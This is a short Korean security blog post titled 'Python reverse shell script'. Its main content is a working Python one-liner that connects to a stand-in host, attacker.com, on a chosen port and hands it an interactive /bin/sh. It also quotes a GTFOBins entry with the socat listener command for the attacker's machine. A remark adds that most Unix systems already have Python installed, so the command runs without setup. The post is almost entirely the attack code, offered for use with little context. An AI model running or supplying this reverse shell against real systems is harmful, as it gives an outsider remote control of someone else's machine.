λ³Έλ¬Έ λ°”λ‘œκ°€κΈ°
πŸ”’μ •λ³΄λ³΄μ•ˆ/μ‹œμŠ€ν…œ λ³΄μ•ˆ

μ‹œμŠ€ν…œ λ³΄μ•ˆ - 파이썬 λ¦¬λ²„μŠ€ μ‰˜ 슀크립트

by Janger 2023. 1. 25.
728x90
λ°˜μ‘ν˜•



export RHOST=attacker.com
export RPORT=12345
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'


λŒ€λΆ€λΆ„μ˜ μœ λ‹‰μŠ€ κ³„μ—΄μ˜ OS(λ¦¬λˆ…μŠ€, λ§₯os)μ—λŠ” python2λŠ” μ„€μΉ˜κ°€ λ˜μ–΄μžˆλŠ” κ²½μš°κ°€ λ§ŽμœΌλ‹ˆ λ³„λ„μ˜ μ„€μΉ˜ 없이 λͺ…λ Ήμ–΄λ§ŒμœΌλ‘œ μ‚¬μš© κ°€λŠ₯ν•˜λ‹€.

좜처:
https://gtfobins.github.io/gtfobins/python/#reverse-shell

python                          |                          GTFOBins

Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s

gtfobins.github.io


728x90
λ°˜μ‘ν˜•